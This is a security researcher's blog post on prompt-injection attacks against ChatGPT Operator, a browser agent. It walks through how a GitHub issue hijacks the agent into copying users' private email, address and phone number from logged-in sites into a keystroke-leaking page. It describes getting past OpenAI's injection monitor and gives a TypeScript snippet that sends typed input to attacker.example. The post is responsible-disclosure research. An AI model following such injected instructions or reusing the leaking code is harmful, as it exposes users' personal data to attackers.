ChatGPT Operator: Prompt Injection Exploits & Defenses

ChatGPT Operator is a research preview agent from OpenAI that lets ChatGPT use a web browser. It uses vision and reasoning abilities to complete tasks like researching topics, booking travel, ordering groceries, or, as this post will show, stealing your data!

Currently, it’s only available for ChatGPT Pro users. I decided to invest $200 for one month to try it out.

Risks and Threats

OpenAI highlights three risk categories in their Operator System Card:

  • User might be misaligned (the user asks for a harmful task),
  • Model might be misaligned (the model makes a harmful mistake), or
  • Website might be misaligned (the website is adversarial in some way).

If you are familiar with my research, this is how I have been framing these threats as well. Here is a screenshot from one of my presentations:

johann 37c3

And for reference, here is the Chaos Communication Congress talk I did on prompt injection.

Coming back to OpenAI’s take, my only feedback is the potential overuse of the term “misaligned”. It makes these issues sound less severe than they are; these can be real attacks with serious consequences for confidentiality, integrity, and availability, as we will highlight in this post.

It’s great to see OpenAI thinking the same way from a risks and threats perspective, though! This is threat modeling in action.

Mitigations and Defenses

The practical mitigations I observed are multi-layered and come down to three primary techniques I encountered while testing:

Mitigation 1: User Monitoring

The user is prompted to “monitor” what Operator is doing: what text it types and which buttons it clicks.

must-monitor

It’s unclear for which pages this screen appears. So far, I have mostly tested with GitHub and Outlook, but I assume it’s based on some data classification model that detects user PII on screen (or similar), rather than on specific domain names.
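
Purely to illustrate the concept (this is speculation on my part, not OpenAI’s actual implementation), a toy check like the following could flag pages whose visible text looks like it contains PII:

```typescript
// Toy sketch only: naive pattern matching for PII-looking strings in visible page
// text. How Operator's monitor actually works is unknown; this just illustrates the
// idea of a data classification check rather than a domain-name allow/deny list.
const EMAIL = /[\w.+-]+@[\w-]+\.[\w.-]+/;
const PHONE = /\+?\d[\d\s().-]{7,}\d/;

function pageLooksSensitive(visibleText: string): boolean {
  return EMAIL.test(visibleText) || PHONE.test(visibleText);
}

// A monitoring layer could use such a signal to decide whether to show the
// "keep monitoring Operator" screen for the current page.
console.log(pageLooksSensitive("Email: jane.doe@example.com")); // true
console.log(pageLooksSensitive("Nothing sensitive here"));      // false
```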

Mitigation 2: Inline Confirmation Requests

Within the chat conversation, Operator may ask the user if a certain action should be performed or request clarification.

inline-confirmation

In the above screenshot you can see a complete prompt injection exploit that hijacked Operator, opened the “Set Status” page, and even typed the attacker-controlled text into the status field. But before it clicks “Set Status”, an in-chat confirmation appears.

It’s worth pointing out that the very first time I tried this prompt injection exploit with setting the status, the status was actually set without any confirmation! But I was not able to reproduce that a second time.

Mitigation 3: Out-of-Band Confirmation Requests

These confirmation requests typically occur when Operator navigates across website boundaries and takes actions that span more complex requests. This is the most intrusive confirmation dialog, and the user has the option to pause or resume the operation.

out-of-band-confirmation

The above screenshot shows the most detailed message I got; it informs the user exactly about what is about to happen and why the dialog appears. However, most of the time the confirmation is a fairly generic message stating that websites might contain instructions that conflict with Operator’s, making it unclear which website’s instructions or content might be malicious.

out-of-band-confirmation-no-details

Before this confirmation dialog appears, there is a noticeable pause, sometimes quite long (20 seconds or more), before the confirmation screen is displayed. So, other reasoning processes and validations are probably happening behind the scenes to decide whether to prompt the user for confirmation.

Finally, there are also data structures in the HTTP requests and responses related to the prompt injection monitor, meaning the APIs send quite a bit of monitor-related information to the client, but I didn’t investigate this in detail.

Trust No AI - Still Holds True

It’s evident that Operator cannot be fully trusted, and these mitigations (which are necessary) will prevent the creation of fully autonomous agents. Check out my paper about Prompt Injection and the CIA Triad if you haven’t read it yet.

Prompt injection risks remain the party pooper, which is a real bummer. I think we would all want autonomous systems that can be trusted to do work on our behalf.

It seems not unlikely that we will work with agents in a much more collaborative way, rather than have them be entirely autonomous.

Related Note: If you are interested in seeing how a similar “computer use” feature by Anthropic Claude can be manipulated into advanced C2-like scenarios, see my post about “ZombAIs”.

Operator: Prompt Injection Exploit Demos

Now, let’s explore a few Operator prompt injection exploits. To demonstrate that the prompt injection monitor can be bypassed by a motivated adversary, I put together a couple of demos that I shared with OpenAI about three weeks ago, since I wanted to make sure they had a heads-up and could mitigate this technique.

Setup - A Tricky Scenario

The scenario I wanted to focus on involved having Operator navigate to another site where the user is logged in, and then leak data from that site, ideally PII. A basic exploit demo was quickly found: leaking the user’s personal profile information from such sites, like email address, home address, and phone number.

During my research, I noticed that Operator follows hyperlinks easily; it seems quite motivated to click on links!

The second thing I observed is that when it submits forms, there is often a confirmation step, either an inline question in the chat or even the UI confirmation dialog described earlier. So, directly asking Operator to click “Update” buttons failed when I tried it.

Sneaky Data Leakage

However, just typing text hardly ever triggers any confirmations.

Equipped with that knowledge, I created a webpage on a third-party server that sends whatever someone types directly to the server without any need to submit a form or click a button.

sneaky tool

In retrospect, it feels a bit dirty having created this. However, such pages are not uncommon, and it is good for users to understand that just typing info into a website, without hitting a submit button, can already be enough for the website to snatch your input.
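
To make this concrete, here is a minimal sketch of the kind of client-side logic such a page can use; the element id and the collection endpoint below are made up for illustration and are not the exact page I built:

```typescript
// Illustrative sketch of a "type-to-leak" page: every keystroke in the text box is
// forwarded to the server immediately, so no submit button or form post is needed.
// "#answer-box" and "https://attacker.example/collect" are hypothetical.
const box = document.querySelector<HTMLInputElement>("#answer-box");

if (box) {
  box.addEventListener("input", () => {
    // Fire-and-forget on every change; the data leaves the page long before
    // anyone decides whether to click a button.
    void fetch("https://attacker.example/collect", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ typed: box.value, ts: Date.now() }),
    });
  });
}
```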

The idea now is to trick Operator into using this page to solve a problem while, in reality, it leaks the data.

Connecting the Attack Dots…

In case you are still wondering what the plan is, here’s a brief explanation of the TTP:

  • Hijack Operator via prompt injection with text on a website,
  • Have it navigate to an authenticated user settings page,
  • Ask it to copy PII (personal info) from that page, and then
  • Paste/type the info into the sneaky data leakage website described above.

To demo this, I tried it with a couple of different pages: The Guardian, YC Hacker News, Booking.com, and a few others, and it worked for all of them. The reason I chose this route is that clicking a “Submit” button more frequently triggered one of the described prompt injection mitigations.

For this explanation, I’ll use the simplest scenario: leaking a user’s YC Hacker News email address, which is not public and only accessible when logged in to the account.

Here is the info of a demo sentinel account:

hnemail

Note: This is not a vulnerability in any of the target sites. However, it raises an interesting question: should websites be able to block “well-meaning” AI agents from accessing certain sensitive pages in the first place? Maybe the User-Agent should indicate that the client is an AI agent.
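
As a thought experiment, a site could gate sensitive pages on such a declared User-Agent. The sketch below assumes a hypothetical “AI-Agent” token and hypothetical protected paths; no such convention exists today:

```typescript
// Sketch of server-side gating based on a (hypothetical) AI-agent User-Agent token.
// The "AI-Agent" marker and the protected paths are assumptions for illustration.
import { createServer } from "node:http";

const PROTECTED_PATHS = ["/settings", "/account"];

createServer((req, res) => {
  const ua = req.headers["user-agent"] ?? "";
  const declaredAgent = /AI-Agent/i.test(ua); // relies on agents identifying themselves
  if (declaredAgent && PROTECTED_PATHS.some((p) => req.url?.startsWith(p))) {
    res.writeHead(403, { "Content-Type": "text/plain" });
    res.end("Automated agents may not access account settings here.");
    return;
  }
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.end("OK");
}).listen(3000);
```

Of course, this only helps against well-behaved agents that identify themselves; a malicious client can spoof any User-Agent.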

Now, let’s look at the prompt injection details.

Hosting the Prompt Injection Payload

The prompt injection payload is hosted on GitHub, as a GitHub issue. It’s a realistic attack scenario if you ask me, because strangers can create issues on most GitHub projects, and AI agents will increasingly be used to read and process GitHub issues.

Here is the GitHub issue that was used:

github-issue-prompt-injection

To simulate a developer interacting with the GitHub issue, I initially just pasted the URL into Operator. It also worked when typing phrases like “Investigate this GitHub issue” and similar. Depending on the user’s prompt, success will differ; this is where it’s important to point out that both attacks and defenses are probabilistic.

Hijacking Operator

Operator eagerly navigates to the GitHub issue and gets busy trying to help. It sees the malicious “combine” tool and, without much hesitation, clicks the link and navigates to the page.

During some tests, it started writing a test message into the textbox, which was immediately sent to the third-party server.

Now comes the interesting part: Operator goes back to the GitHub issue and focuses on the main task, which is to navigate to the account settings page of news.ycombinator.com, copy out the private email address, and then switch back to the malicious webpage to paste the data, leading to the attacker receiving the information.

Here is a picture that shows some of the key steps of the YC Hacker News demo:

operator-end2end

Operator grabs the user’s email address (which is not public) and pastes it into the data leakage form.

github-issue-prompt-injection

Now the attacker has the data! Wild. Here is an end-to-end video, in case the explanation above was not that clear.


This technique works with different websites. Here is an example with booking.com, where prompt injection hijacks Operator and leaks user data, including address and phone number.

github-issue-prompt-injection

Closely monitoring what actions Operator takes is quite important at the moment; if the browser is authenticated to websites, scary things could happen.

Probabilistic Defenses

Although the demos at times worked on the first try, prompt injections are not 100% reliable, and neither are the defenses. Many of the mitigations act as probabilistic defenses, reducing but not eliminating the risk. These demos are representative, but not comprehensive.

I observed that mitigations typically trigger at the last moment before a dangerous action is taken. Prompt injection is not prevented; the focus is on detecting dangerous actions, which seems to emphasize that there is no fix for prompt injection itself. Agents will be like potentially malicious insiders in companies, although for personal usage I haven’t found a good analogy yet.

Implications

This demonstration has several broader implications:

  • User Privacy and Security
    Operator can be tricked into navigating to malicious sites, which highlights phishing risks. Users' personal data, including sensitive PII, can be inadvertently exposed if adequate safeguards are not consistently applied. I would not recommend giving Operator access to sensitive websites, like your primary email account. Consider using separate accounts for experiments, or create accounts specific to a use case.

  • Server-Side Solution: Additional Privacy and Security Concerns
    Furthermore, Operator sessions run server-side. This means that, technically, OpenAI staff have access to all the data that is entered, as well as session cookies, authorization tokens, etc. There is a custom Operator Chrome extension and a local webserver running on the Operator host (for instance, http://localhost:8080/events). It is unclear exactly what those endpoints are used for, but some are probably collecting telemetry data. I haven’t found documentation about it.

  • Designing and Refining Safer AI Agents
    It is important to refine these mitigations to reduce the likelihood of prompt injection bypasses. Since my tests also triggered the prompt injection monitor, I waited a few days and tried again, but the monitor had not yet learned about the attack I performed, and my retries often still worked, since I further refined the attack payload on my side the more I learned. As defenses improve, so will attacks. Additionally, I also shared these proof-of-concept scenarios with OpenAI.

  • Trust in Automated Systems and Open Source
    Prompt injection mitigation bypasses like these can erode trust in automated systems if exploited maliciously. Therefore, maintaining and improving transparency in how AI agents validate and protect data seems important. Could something like the prompt injection monitor be open-sourced?

Tests to Have Operator Click the “Update” Buttons - Failed!

I also tried a couple of tests with directly modifying information on sites by asking ChatGPT Operator to click “Update” buttons during prompt injection attacks.

Those tests generally failed and triggered an in-band confirmation request. However, there was one time early in my research when it worked: the scenario involved updating my GitHub account status via prompt injection from a GitHub issue. It’s also worth highlighting that some modern apps do not require clicking update buttons anymore; they just save information automatically.

There is a lot more to explore and test in this space. From old-school UI spoofing tricks like clickjacking to modern LLM trickery, there are many possible avenues for tricking Operator.

Responsible Disclosure

About three weeks ago I provided OpenAI with the details of the prompt injection monitor bypasses described in this post, including videos of the initial demo exploits with booking.com and theguardian.com. Until about a week ago the demos worked quite reliably. Since then, however, the specific attack scenarios discussed in this post appear to no longer work. The details of the mitigation remain unknown.

It is important to highlight that there are, very likely, more bypasses and tricks attackers can leverage to hijack Operator via instructions on websites. So, be careful and keep monitoring what Operator does.

Conclusion

This post explored how ChatGPT Operator can be hijacked through prompt injection exploits on web pages, leading to unauthorized data leakage of personal information.

Operator is very cool and useful, and it provides a glimpse into the not-so-distant future. I just enjoy watching it go explore and work on tasks!

However, by demonstrating real-world exploit scenarios, this post illustrates vulnerabilities of Operator (and other computer-use agents). It’s great to see OpenAI’s investments in making the system more trustworthy and secure, even though there is still work to do. It appears that we have arrived at the point where it is accepted that prompt injection is not solvable per se, and that monitoring of actions and behavior is required to determine whether an agent does something malicious. There is a lot that can go wrong.

Finally, it would be valuable if the prompt injection monitor, or at least parts of it, were open-sourced, or if OpenAI shared more details on their approach. This would allow researchers to evaluate it more effectively and help others learn from OpenAI’s expertise and approach. As AI systems continue to evolve in scale, reasoning and speed, a proactive stance on security will be essential.

Thanks for reading.

– Johann.

References